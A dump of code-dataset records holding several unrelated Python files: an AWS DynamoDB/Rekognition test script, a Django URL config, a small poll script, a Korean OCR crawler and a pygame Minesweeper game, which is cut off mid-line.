: { 'N': str(looterJsonContent[\"edge_liked_by\"][\"count\"]) },\n\t\t\t\t\"commentsCount\" : { 'N': str(looterJsonContent[\"edge_media_to_comment\"][\"count\"]) }\n\t\t\t}\n\t\t)\n\n\t\tprint(\"response:\")\n\t\tprint(response)\n\n\twith open(argv[2]) as rekJsonFile:\n\t\trekJsonContent = json.loads(rekJsonFile.read())\n\n\t\tfor iFaceDetails in range(len(rekJsonContent[\"FaceDetails\"])):\n\t\t\tfaceDetails = rekJsonContent[\"FaceDetails\"][iFaceDetails]\n\n\t\t\temotions = { x[\"Type\"] : x[\"Confidence\"] for x in faceDetails[\"Emotions\"] }\n\n\t\t\tresponse = dynamodb_client.put_item(\n\t\t\t\tTableName='rekognition',\n\t\t\t\tItem={\n\t\t\t\t\t\"id\" : { 'S': id },\n\t\t\t\t\t\"faceIndex\" : { 'N': str(iFaceDetails) },\n\t\t\t\t\t\"confidence\" : { 'N' : str(faceDetails[\"Confidence\"]) },\n\t\t\t\t\t\"ageLow\" : { 'N' : str(faceDetails[\"AgeRange\"][\"Low\"]) },\n\t\t\t\t\t\"ageHigh\" : { 'N' : str(faceDetails[\"AgeRange\"][\"High\"]) },\n\t\t\t\t\t\"gender\" : { 'S' : faceDetails[\"Gender\"][\"Value\"] },\n\t\t\t\t\t\"eyeglasses\" : { 'BOOL' : faceDetails[\"Eyeglasses\"][\"Value\"] == True },\n\t\t\t\t\t\"sunglasses\" : { 'BOOL' : faceDetails[\"Sunglasses\"][\"Value\"] == True },\n\t\t\t\t\t\"beard\" : { 'BOOL' : faceDetails[\"Beard\"][\"Value\"] == True },\n\t\t\t\t\t\"moustache\" : { 'BOOL' : faceDetails[\"Mustache\"][\"Value\"] == True },\n\t\t\t\t\t\"happyConfidence\" : { 'N' : str(emotions[\"HAPPY\"]) },\n\t\t\t\t\t\"surprisedConfidence\" : { 'N' : str(emotions[\"SURPRISED\"]) },\n\t\t\t\t\t\"fearConfidence\" : { 'N' : str(emotions[\"FEAR\"]) },\n\t\t\t\t\t\"sadConfidence\" : { 'N' : str(emotions[\"SAD\"]) },\n\t\t\t\t\t\"angryConfidence\" : { 'N' : str(emotions[\"ANGRY\"]) },\n\t\t\t\t\t\"disgustedConfidence\" : { 'N' : str(emotions[\"DISGUSTED\"]) },\n\t\t\t\t\t\"confusedConfidence\" : { 'N' : str(emotions[\"CONFUSED\"]) },\n\t\t\t\t\t\"calmConfidence\" : { 'N' : str(emotions[\"CALM\"]) }\n\t\t\t\t}\n\t\t\t)\n\n\t\t\tprint(\"response:\")\n\t\t\tprint(response)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","repo_name":"Zalez95/TFM","sub_path":"scripts/tests/aws/dynamodbtest.py","file_name":"dynamodbtest.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41093912356","text":"# from django.conf.urls import url\nfrom django.urls import path\nfrom OfflinePlaylist import views\n\napp_name = 'OfflinePlaylist'\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('playlist/', views.playlists, name='playlists'),\n path('test/', views.test, name='test'),\n path('GetPlaylists/', views.get_playlist, name='GetPlaylists'),\n path('song/<int:pk>', views.song_view, name='curr_song')\n]","repo_name":"sandipan-basak/Offline_Music_Palyer","sub_path":"OfflinePlaylist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38693100887","text":"file_name = 'reasons.txt'\n\nreasons = []\nwhile True:\n answers = input(\"Why do you like programming?: \")\n reasons.append(answers)\n\n continue_poll = input(\"Would do like to continue the poll?:(y/n) \")\n if continue_poll == 'n':\n break\n\nwith open(file_name, 'a') as file_object:\n for reason in reasons:\n file_object.write(f\"{reason}\\n\")","repo_name":"YolbarsZiya1997/Python_Projects","sub_path":"files&exceptions/elegent_gp.py","file_name":"elegent_gp.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73343735173","text":"from PIL import Image\nimport bs4\nimport os\nimport pytesseract\nimport sys\n\nconfig = ('--psm 4 -c tessedit_create_hocr=1')\n\n# https://blog.naver.com/momsfood_ 맘스푸드 블로그 주소\n\ndef main(argv):\n for filename in os.listdir(\".\"):\n if str(filename) not in ['.','..']:\n nameParts = str(filename).split(\".\")\n if nameParts[-1].lower() in [\"gif\", \"png\", \"jpg\", \"jpeg\"]:\n try:\n # print(\"Found file \" + str(filename))\n # ocrText = pytesseract.image_to_string(str(filename), timeout=5, config=config)\n # print (ocrText)\n # print(\"\")\n pytesseract.pytesseract.run_tesseract(str(filename), str(filename+\"_parsed\"), extension='png', lang = 'kor', config=config)\n xml_input = open(str(filename+\"_parsed.hocr\"), \"r\", encoding=\"utf-8\")\n soup = bs4.BeautifulSoup(xml_input, 'lxml')\n\n ocr_lines = soup.findAll(\"span\", {\"class\": \"ocr_line\"})\n\n lines_structure = []\n for line in ocr_lines:\n line_text = line.text.replace(\"\\n\", \" \").strip()\n title = line['title']\n x1, y1, x2, y2 = map (int, title[5:title.find(\";\")].split())\n lines_structure.append({\"x1\":x1, \"y1\": y1, \"x2\": x2, \"y2\": y2, \"text\":line_text})\n except Exception as err:\n print(\"error occured\" + str(err))\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"RedForest0607/momsfood-crawling","sub_path":"momsfood-crawler.py","file_name":"momsfood-crawler.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5797064015","text":"\"\"\"\r\nTODO:\r\n\r\nOptimizations (if needed)\r\n\"\"\"\r\n\r\n\r\nfrom write import write\r\n\r\nimport os\r\nimport sys\r\n\r\nimport numpy as np\r\nimport random\r\n\r\nimport time\r\n\r\nimport pygame\r\n\r\nsys.setrecursionlimit(26194)\r\n\r\npyg = pygame\r\ndisp = pygame.display\r\n\r\npyg.init()\r\ndisp.init()\r\n\r\n\"\"\"Colors\"\"\"\r\nWHITE = pyg.Color('white')\r\nBLACK = pyg.Color('black')\r\nGREEN = pyg.Color('green')\r\nRED = pyg.Color('red')\r\nYELLOW = pyg.Color('yellow')\r\nLIGHTBLUE = pyg.Color('lightblue')\r\n\r\nbg_col = WHITE\r\nline_col = BLACK\r\ntext_col = BLACK\r\nbtn_col = GREEN\r\nquit_col = RED\r\noption_col = YELLOW\r\nchange_optn_col = YELLOW\r\nup_col = LIGHTBLUE\r\ndown_col = LIGHTBLUE\r\n\r\n\"\"\"Screen\"\"\"\r\n# Resolutions: 960x720, 1080x720, 1536x864\r\nscreen = disp.set_mode((1536, 864))\r\nscreen_w, screen_h = screen.get_size()\r\nscreen.fill(bg_col)\r\ndisp.flip()\r\n\r\ndisp.set_caption('Minesweeper')\r\n\r\n\r\n\"\"\"Images\"\"\"\r\n\r\n\r\ndef load_img(name, conv_alpha=False):\r\n \"\"\"Loads image\"\"\"\r\n image_name = os.path.join('img', 'Minesweeper', name)\r\n image = pyg.image.load(image_name)\r\n if conv_alpha:\r\n image = image.convert_alpha()\r\n else:\r\n image = image.convert()\r\n image_rect = image.get_rect()\r\n return image, image_rect\r\ntile_1, tile_1_rect = load_img('1.bmp') # 1 tile\r\ntile_2, tile_2_rect = load_img('2.bmp') # 2 tile\r\ntile_3, tile_3_rect = load_img('3.bmp') # 3 tile\r\ntile_4, tile_4_rect = load_img('4.bmp') # 4 tile\r\ntile_5, tile_5_rect = load_img('5.bmp') # 5 tile\r\ntile_6, tile_6_rect = load_img('6.bmp') # 6 tile\r\ntile_7, tile_7_rect = load_img('7.bmp') # 7 tile\r\ntile_8, tile_8_rect = load_img('8.bmp') # 8 tile\r\ntile_blank, tile_blank_rect = load_img('Empty.bmp') # Indented blank tile\r\ntile_mark, tile_mark_rect = load_img('Mark.bmp') # Marker tile\r\ntile_mark_through, tile_mark_through_rect = load_img('Mark_Through.bmp')\r\ntile_mine, tile_mine_rect = load_img('Mine.bmp') # Mine tile\r\ntile_blank_up, tile_blank_up_rect = load_img('Empty_Up.bmp') # Blank tile\r\ntile_blank_up_through, tile_blank_up_through_rect =\\\r\n load_img('Empty_Up_Through.bmp')\r\ntile_blank_up_through2, tile_blank_up_through_rect2 =\\\r\n load_img('Empty_Up_Through.bmp')\r\ntile_mark_through2, tile_mark_through_rect2 = load_img('Mark_Through.bmp')\r\ntile_cpumark, tile_cpumark_rect = load_img('CpuMark.bmp')\r\ntile_dot, tile_dot_rect = load_img('Dot.png', conv_alpha=True)\r\n\r\n\"\"\"Grid size\"\"\"\r\nsize_w = 30\r\nsize_h = 30\r\n\"\"\"Mine count\"\"\"\r\nmines = 125\r\n\r\n\"\"\"Options\"\"\"\r\nshow_destroy = False\r\ncpu = False\r\nwait = 1\r\nmode = 1\r\nvis_helper = True\r\nshow_time = True\r\n\"\"\"\r\nModes:\r\n1: Normal 5: Diagonal\r\n XXX X-X\r\n XOX -O-\r\n XXX X-X\r\n2: Knight's path 6: Far diagonal\r\n -X-X- X---X\r\n X---X -X-X-\r\n --O-- --O--\r\n X---X -X-X-\r\n -X-X- X---X\r\n3: Orthogonal\r\n -X-\r\n XOX\r\n -X-\r\n4: Far orthogonal\r\n --X--\r\n --X--\r\n XXOXX\r\n --X--\r\n --X--\r\n\"\"\"\r\naround = []\r\nmodes_str = {1: 'Normal',\r\n 2: \"Knight's Path\",\r\n 3: 'Orthogonal',\r\n 4: 'Far Orthogonal',\r\n 5: 'Diagonal',\r\n 6: 'Far Diagonal'}\r\n\r\n\"\"\"Functions\"\"\"\r\n\r\n\r\ndef update():\r\n disp.flip()\r\n pyg.event.pump()\r\n\r\n\r\ndef clear():\r\n screen.fill(bg_col)\r\n\r\n\r\ndef ind_rel(x_d, y_d): # Get the relative index (with diff x_d and y_d)\r\n return index+(x_d)+(y_d*size_w) # Return index\r\n\r\n\r\ndef count_mines(x, y):\r\n c = 0\r\n for dx, dy in around:\r\n if x+dx >= size_h or y+dy >= size_w or x+dx < 0 or y+dy < 0:\r\n continue\r\n elif tiles[x+dx, y+dy] == 9:\r\n c += 1\r\n return c\r\n\r\n\r\ndef set_mode():\r\n global around\r\n if mode == 1: # Normal\r\n around = ((-1, -1), ( 0, -1), ( 1, -1),\r\n (-1, 0), ( 1, 0),\r\n (-1, 1), ( 0, 1), ( 1, 1))\r\n elif mode == 2: # Knight's path\r\n around = ( (-1, -2), ( 1, -2),\r\n (-2, -1), ( 2, -1),\r\n (-2, 1), ( 2, 1),\r\n (-1, 2), ( 1, 2))\r\n elif mode == 3: # Orthogonal\r\n around = ( (0, -1),\r\n (-1, 0), ( 1, 0),\r\n (0, 1))\r\n elif mode == 4: # Far Orthogonal\r\n around = ( (0, -2),\r\n (0, -1),\r\n (-2, 0), (-1, 0), ( 1, 0), ( 2, 0),\r\n (0, 1),\r\n (0, 2))\r\n elif mode == 5: # Diagonal\r\n around = ((-1, -1), (1, -1),\r\n (-1, 1), (1, 1))\r\n elif mode == 6: # Far Diagonal\r\n around = ((-2, -2), (2, -2),\r\n (-1, -1), (1, -1),\r\n (-1, 1), (1, 1),\r\n (-2, 2), (2, 2))\r\n\r\nset_mode() # Sets around variable according to mode\r\n\r\n\r\ndef delaround(i, j):\r\n \"\"\"Reveal tiles around a clicked tile\"\"\"\r\n global game_over, last_destroy\r\n # If the clicked tile is already revealed, do nothing.\r\n if tiles_cover[i, j].get_size() == (0, 0):\r\n return\r\n if tiles_cover[i, j] == tile_img_list[11]:\r\n return\r\n if tiles_cover[i, j] != tile_img_list[11]:\r\n tiles_cover[i, j] = pyg.Surface((0, 0)) # Reveal clicked tile\r\n last_destroy = (i, j)\r\n if tiles[i, j] == 9: # If mine is under clicked tile\r\n game_over = 1\r\n # If the current tile is blank, check all adjacent tiles\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n # Cycles through surrounding tiles\r\n for x, y in cycle:\r\n if show_destroy:\r\n pyg.event.pump()\r\n # If x or y coordinates are off the grid, skip this loop\r\n if x >= size_h or y >= size_w or x < 0 or y < 0:\r\n continue\r\n # If the current tile is already uncovered, skip loop\r\n if tiles_cover[x, y].get_size() == (0, 0):\r\n continue\r\n if tiles_cover[x, y] == tile_img_list[11]:\r\n continue\r\n # If clicked tile is a number tile, uncover it\r\n if tiles[i, j] == 0 and tiles[x, y] in range(1, 9):\r\n tiles_cover[x, y] = pyg.Surface((0, 0))\r\n last_destroy = (i, j)\r\n if show_destroy:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n # If clicked tile is blank, call function at the tile\r\n elif tiles[x, y] == 0: # abs(x-i)+abs(y-j) != 2\r\n if show_destroy:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n delaround(x, y)\r\n\r\n\r\ndef draw_all():\r\n clear()\r\n draw_img()\r\n draw_cover()\r\n draw_time()\r\n draw_mines_left()\r\n update()\r\n\r\n\r\ndef draw_cover():\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n dest_y = screen_h//2 - (size_h*tile_h)//2\r\n\r\n for y in tiles_cover:\r\n for x in y:\r\n screen.blit(x, (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n\r\n\r\ndef draw_img():\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n dest_y = screen_h//2 - (size_h*tile_h)//2\r\n\r\n for y in tiles_img:\r\n for x in y:\r\n screen.blit(x, (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n\r\n\r\ndef draw_time():\r\n if time_start:\r\n cur_time = time.time()-time_start\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(cur_time-int(cur_time), 2))[2:],\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n\r\n\r\ndef draw_mines_left():\r\n write(screen, 'Mines Left: '+str(mines_left),\r\n text_col, None, 28, screen_w//2, 50)\r\n\r\n\r\n\"\"\"Mark Tile\"\"\"\r\n\r\n\r\ndef mark(i, j):\r\n global mines_left\r\n if tiles_cover[i, j] == tile_img_list[11]:\r\n tiles_cover[i, j] = tile_img_list[10]\r\n mines_left += 1\r\n elif tiles_cover[i, j] == tile_img_list[10]:\r\n tiles_cover[i, j] = tile_img_list[11]\r\n mines_left -= 1\r\n\r\n\r\ndef clear_tiles(i, j):\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n if tiles_img[i, j] in tile_img_list[1:9]:\r\n count = 0\r\n for x, y in cycle:\r\n if x < 0 or y < 0 or x >= size_h or y >= size_w:\r\n continue\r\n if tiles_cover[x, y] == tile_img_list[11]:\r\n count += 1\r\n if count == tiles[i, j]:\r\n for x, y in cycle:\r\n if x < 0 or y < 0 or x >= size_h or y >= size_w:\r\n continue\r\n delaround(x, y)\r\n\r\n\r\ndef show_mines():\r\n for x, y in mine_indices:\r\n if tiles_cover[x, y] == tile_img_list[10]:\r\n tiles_cover[x, y] = tile_img_list[12]\r\n elif tiles_cover[x, y] == tile_img_list[11]:\r\n tiles_cover[x, y] = tile_img_list[13]\r\n\r\n for a in range(255, 100, -1):\r\n tile_img_list[12].set_alpha(a)\r\n tile_img_list[13].set_alpha(a)\r\n\r\n draw_img()\r\n draw_cover()\r\n\r\n update()\r\n pyg.event.pump()\r\n pyg.time.delay(20)\r\n\r\n\r\ndef explode_mines():\r\n b = False\r\n index_coords = last_destroy\r\n tile_img_list[14].set_alpha(100)\r\n tile_img_list[15].set_alpha(100)\r\n mine_distance = []\r\n for x, y in mine_indices:\r\n mine_distance.append(\r\n (\r\n ((index_coords[0]-x)**2 + (index_coords[1]-y)**2)**0.5,\r\n mine_indices.index((x, y)))\r\n )\r\n\r\n mine_distance.sort()\r\n\r\n for dist, mine_index in mine_distance:\r\n x, y = mine_indices[mine_index]\r\n cur_tile_img = tiles_cover[x, y]\r\n if tiles_cover[x, y] == tile_img_list[10]:\r\n tiles_cover[x, y] = tile_img_list[12]\r\n elif tiles_cover[x, y] == tile_img_list[11]:\r\n tiles_cover[x, y] = tile_img_list[13]\r\n for a in range(255, 100, -15):\r\n tile_img_list[12].set_alpha(a)\r\n tile_img_list[13].set_alpha(a)\r\n\r\n draw_img()\r\n draw_cover()\r\n\r\n update()\r\n event = pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 2 and event.dict['key'] == 27:\r\n for x, y in mine_indices:\r\n if tiles_cover[x, y] == tile_img_list[10] or\\\r\n tiles_cover[x, y] == tile_img_list[12]:\r\n tiles_cover[x, y] = tile_img_list[14]\r\n elif tiles_cover[x, y] == tile_img_list[11] or\\\r\n tiles_cover[x, y] == tile_img_list[13]:\r\n tiles_cover[x, y] = tile_img_list[15]\r\n draw_img()\r\n draw_cover()\r\n update()\r\n b = True\r\n break\r\n if b:\r\n break\r\n\r\n if tiles_cover[x, y] == tile_img_list[12]:\r\n tiles_cover[x, y] = tile_img_list[14]\r\n elif tiles_cover[x, y] == tile_img_list[13]:\r\n tiles_cover[x, y] = tile_img_list[15]\r\n\r\n\r\ndef show_all():\r\n for a in range(255, 200, -1):\r\n tile_img_list[10].set_alpha(a)\r\n tile_img_list[11].set_alpha(a)\r\n draw_img()\r\n draw_cover()\r\n update()\r\n pyg.event.pump()\r\n pyg.time.delay(20)\r\n\r\n\r\ndef resize_tiles():\r\n global tile_h, tile_w, tile_ratio, tile_img_list, tile_rect_list\r\n global tile_1, tile_1_rect, tile_2, tile_2_rect,\\\r\n tile_3, tile_3_rect, tile_4, tile_4_rect,\\\r\n tile_5, tile_5_rect, tile_6, tile_6_rect,\\\r\n tile_7, tile_7_rect, tile_8, tile_8_rect,\\\r\n tile_blank, tile_blank_rect, tile_mark, tile_mark_rect,\\\r\n tile_mark_through, tile_mark_through_rect,\\\r\n tile_mark_through2, tile_mark_through_rect2,\\\r\n tile_mine, tile_mine_rect, tile_blank_up, tile_blank_up_rect,\\\r\n tile_blank_up_through, tile_blank_up_through_rect,\\\r\n tile_blank_up_through2, tile_blank_up_through_rect2,\\\r\n tile_cpumark, tile_cpumark_rect, tile_dot, tile_dot_rect\r\n\r\n tile_img_list = [\r\n tile_blank, tile_1, tile_2, tile_3, tile_4, tile_5,\r\n tile_6, tile_7, tile_8, tile_mine,\r\n tile_blank_up, tile_mark, tile_blank_up_through, tile_mark_through,\r\n tile_blank_up_through2, tile_mark_through2, tile_cpumark, tile_dot\r\n ] # List of tile images\r\n\r\n for i in [x for x in tile_img_list if x != tile_dot]:\r\n i.set_alpha(255)\r\n tile_dot.set_alpha(64)\r\n\r\n tile_h = (screen_h-150)//size_h # Tile height (resized)\r\n tile_w = tile_h # Tile width is equal to the tile height (resized)\r\n if tile_w*size_w >= screen_w-500:\r\n tile_w = (screen_w-500)//size_w\r\n tile_h = tile_w\r\n\r\n tile_ratio = 50/tile_h # Tile ratio\r\n\r\n tile_img_list = [\r\n pyg.transform.scale(img, (tile_h, tile_w)) for img in tile_img_list\r\n ] # Scaled images for tile images\r\n tile_rect_list = [\r\n img.get_rect() for img in tile_img_list\r\n ] # Scaled image rects for tile images\r\n\r\n (tile_blank_rect,\r\n tile_1_rect, tile_2_rect, tile_3_rect, tile_4_rect,\r\n tile_5_rect, tile_6_rect, tile_7_rect, tile_8_rect,\r\n tile_mine_rect,\r\n tile_blank_up_rect,\r\n tile_mark_rect,\r\n tile_blank_up_through_rect,\r\n tile_mark_through_rect,\r\n tile_blank_up_through_rect2,\r\n tile_mark_through_rect2,\r\n tile_cpumark_rect,\r\n tile_dot_rect\r\n ) = tile_rect_list # Set rect variables\r\n\r\n (tile_blank,\r\n tile_1, tile_2, tile_3, tile_4,\r\n tile_5, tile_6, tile_7, tile_8,\r\n tile_mine,\r\n tile_blank_up,\r\n tile_mark,\r\n tile_blank_up_through,\r\n tile_mark_through,\r\n tile_blank_up_through2,\r\n tile_mark_through2,\r\n tile_cpumark,\r\n tile_dot\r\n ) = tile_img_list # Set image variables\r\n\r\n\r\ndef main():\r\n global record_time, cur_time, time_start, end_time,\\\r\n index, game_over, mines_left, mine_indices,\\\r\n index_coords\r\n global tile_1, tile_1_rect, tile_2, tile_2_rect,\\\r\n tile_3, tile_3_rect, tile_4, tile_4_rect,\\\r\n tile_5, tile_5_rect, tile_6, tile_6_rect,\\\r\n tile_7, tile_7_rect, tile_8, tile_8_rect,\\\r\n tile_blank, tile_blank_rect, tile_mark, tile_mark_rect,\\\r\n tile_mark_through, tile_mark_through_rect,\\\r\n tile_mine, tile_mine_rect, tile_blank_up, tile_blank_up_rect,\\\r\n tile_blank_up_through, tile_blank_up_through_rect,\\\r\n tile_dot, tile_dot_rect\r\n global tiles, tiles_img, tile_img_list,\\\r\n tile_h, tile_w, tile_rect_list, tiles_cover\r\n\r\n game_over = 0\r\n cur_time = None\r\n time_start = None\r\n end_time = 2**1000\r\n set_mode()\r\n\r\n mines_left = int(mines)\r\n\r\n \"\"\"Variables/Tiles\"\"\"\r\n\r\n tiles = np.array([[0]*size_w]*size_h) # Tiles (numbers)\r\n\r\n tile_img_list = [\r\n tile_blank, tile_1, tile_2, tile_3, tile_4, tile_5,\r\n tile_6, tile_7, tile_8, tile_mine,\r\n tile_blank_up, tile_mark, tile_blank_up_through, tile_mark_through,\r\n tile_blank_up_through2, tile_mark_through2\r\n ] # List of tile images\r\n\r\n resize_tiles()\r\n\r\n # Board tile images\r\n tiles_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n # Overlay tile images\r\n tiles_cover = np.array([[tile_blank_up]*size_w]*size_h)\r\n\r\n tiles_rect = [] # Initialize tile_rect list for checking clicks\r\n\r\n i = 0 # Initialize i and j coordinates of tile list\r\n j = 0\r\n\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Destination of tiles\r\n dest_y = screen_h//2 - (size_h*tile_h)//2 # (Centered around middle)\r\n\r\n clear()\r\n\r\n if record_time:\r\n write(screen,\r\n 'Record Time: ' + str(int(record_time)//60) + ':' +\r\n str(int(record_time) % 60).zfill(2) + '.' +\r\n str(round(record_time-int(record_time), 2))[2:].zfill(2),\r\n text_col, None, 28, 25, screen_h-50,\r\n centered=False)\r\n\r\n \"\"\"Draw tiles\"\"\"\r\n for y in tiles_cover: # Go through the tiles vertically\r\n for x in y: # Go through each tile in the lists\r\n blitrect = screen.blit(x, (dest_x, dest_y)) # Draw tile\r\n tiles_rect.append(blitrect) # Append tile rect for click detection\r\n dest_x += tile_w # Move the destination x-coord to the right\r\n dest_y += tile_h # Move the destination y-coord downwards\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Reset x-coord\r\n\r\n update() # Update screen\r\n\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n write(screen, 'Start by clicking a tile.',\r\n text_col, None, 28, screen_w//2, 35)\r\n update()\r\n\r\n \"\"\"Get first click\"\"\"\r\n running = True\r\n while running:\r\n event = pyg.event.get() # Get eventlist\r\n if event: # If something happens,\r\n event = event[0] # Get the event itself\r\n else: # Otherwise,\r\n event = pyg.event.Event(-1) # Set event to something else\r\n if event.type == pyg.QUIT:\r\n running = False\r\n break\r\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1: # Left click\r\n print(\"click registered\")\r\n click = pyg.Rect(event.dict['pos'], (1, 1)) # Record pos as rect\r\n index = click.collidelist(tiles_rect) # Get index of rect clicked\r\n if index == -1:\r\n continue\r\n i = index // size_h # Get y-coord of rect clicked\r\n j = index % size_w # Get x-coord of rect clicked\r\n index_coords = (i, j) # Format as ordered pair\r\n break # Exit loop\r\n if not running:\r\n pyg.quit()\r\n return\r\n\r\n \"\"\"Set up board\"\"\"\r\n \"\"\"No-mine locations\"\"\"\r\n no_mines = [\r\n ind_rel(-2, -2), ind_rel(-1, -2),\r\n ind_rel(+0, -2), ind_rel(+1, -2), ind_rel(+2, -2),\r\n ind_rel(-2, -1), ind_rel(-1, -1),\r\n ind_rel(+0, -1), ind_rel(+1, -1), ind_rel(+2, -1),\r\n ind_rel(-2, +0), ind_rel(-1, +0),\r\n ind_rel(+0, +0), ind_rel(+1, +0), ind_rel(+2, +0),\r\n ind_rel(-2, +1), ind_rel(-1, +1),\r\n ind_rel(+0, +1), ind_rel(+1, +1), ind_rel(+2, +1),\r\n ind_rel(-2, +2), ind_rel(-1, +2),\r\n ind_rel(+0, +2), ind_rel(+1, +2), ind_rel(+2, +2)\r\n ] # List of places where there should be no mines at first click\r\n\r\n mine_indices = [index] # Initialize mine indices\r\n while True:\r\n for i in no_mines: # Cycle through places where no mines should be\r\n if i in mine_indices: # If one of the mines is in that place,\r\n mine_indices = random.sample(\r\n range(0, size_w*size_h), mines\r\n ) # Randomize mine placement\r\n break # Exit inner loop\r\n else: # When there are no mines in the place where they shouldn't be,\r\n break # Exit loop\r\n\r\n for mine_index in range(len(mine_indices)): # Loop though each mine\r\n index = mine_indices[mine_index] # Record the index\r\n i = index // size_w # Get the y-coordinate of the index\r\n j = index % size_h # Get the x-coordinate of the index\r\n mine_indices[mine_index] = (i, j) # Format as ordered pair\r\n tiles[i, j] = 9 # Set the tile number to 9 (denotes mine)\r\n\r\n \"\"\"Number of mines surrounding a tile\"\"\"\r\n for x in range(size_h): # Loop though the vertical coordinates\r\n for y in range(size_w): # Loop through the horizontal coordinates\r\n if tiles[x, y] == 9: # If the tile is a mine,\r\n continue # Skip this loop\r\n\r\n tiles[x, y] = count_mines(x, y)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n tiles_img[i, j] = tile_img_list[tiles[i, j]]\r\n\r\n index_coords_marker = (-1, -1)\r\n index_coords_clear = (-1, -1)\r\n mark_around = False\r\n running = True\r\n while running:\r\n if index_coords != (-1, -1):\r\n delaround(*index_coords)\r\n if game_over != 1:\r\n index_coords = (-1, -1)\r\n\r\n if time_start is None:\r\n time_start = time.time()\r\n\r\n if index_coords_marker != (-1, -1):\r\n i, j = index_coords_marker\r\n if mark_around:\r\n for di, dj in around:\r\n if i+di < 0 or j+dj < 0 or\\\r\n i+di >= size_h or j+dj >= size_w:\r\n continue\r\n if tiles_cover[i+di, j+dj] in (tile_blank_up,\r\n tile_cpumark):\r\n mark(i + di, j + dj)\r\n mark_around = False\r\n else:\r\n mark(*index_coords_marker)\r\n index_coords_marker = (-1, -1)\r\n\r\n if index_coords_clear != (-1, -1):\r\n clear_tiles(*index_coords_clear)\r\n index_coords_clear = (-1, -1)\r\n\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n tiles_img[i, j] = tile_img_list[tiles[i, j]]\r\n\r\n draw_img()\r\n draw_cover()\r\n update()\r\n\r\n b = False\r\n for x in range(len(tiles_img)):\r\n for y in range(len(tiles_img[x])):\r\n if tiles_img[x, y] != tile_img_list[9] and\\\r\n tiles_cover[x, y] == tile_img_list[10] and\\\r\n tiles_cover[x, y] != tile_img_list[11]:\r\n b = True\r\n break\r\n if b:\r\n break\r\n else:\r\n cur_time = time.time()-time_start\r\n end_time = cur_time\r\n clear()\r\n write(screen, 'You win!!!',\r\n text_col, None, 36, screen_w//2, 35)\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(cur_time-int(cur_time), 2))[2:],\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n show_mines()\r\n draw_img()\r\n draw_cover()\r\n update()\r\n break\r\n\r\n if game_over == 1:\r\n clear()\r\n cur_time = time.time()-time_start\r\n write(screen, 'Game Over.',\r\n text_col, None, 36, screen_w//2, 35)\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(cur_time-int(cur_time), 2))[2:],\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n explode_mines()\r\n show_all()\r\n draw_img()\r\n draw_cover()\r\n update()\r\n break\r\n\r\n while running:\r\n event = pyg.event.get()\r\n pressed = pyg.key.get_pressed()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pyg.QUIT:\r\n running = False\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1:\r\n click = pyg.Rect(event.dict['pos'], (1, 1))\r\n index = click.collidelist(tiles_rect)\r\n if index == -1:\r\n continue\r\n i = index // size_w\r\n j = index % size_h\r\n index_coords = (i, j)\r\n break\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 3:\r\n click = pyg.Rect(event.dict['pos'], (1, 1))\r\n index_marker = click.collidelist(tiles_rect)\r\n if index_marker == -1:\r\n continue\r\n i = index_marker // size_h\r\n j = index_marker % size_w\r\n index_coords_marker = (i, j)\r\n if pressed[pyg.K_LSHIFT] or pressed[pyg.K_RSHIFT]:\r\n empty_up_count = 0\r\n for di, dj in around:\r\n if i+di < 0 or j+dj < 0 or\\\r\n i+di >= size_h or j+dj >= size_w:\r\n continue\r\n if tiles_cover[i+di, j+dj] in tile_img_list[10:12]:\r\n empty_up_count += 1\r\n if empty_up_count == count_mines(i, j):\r\n mark_around = True\r\n break\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and 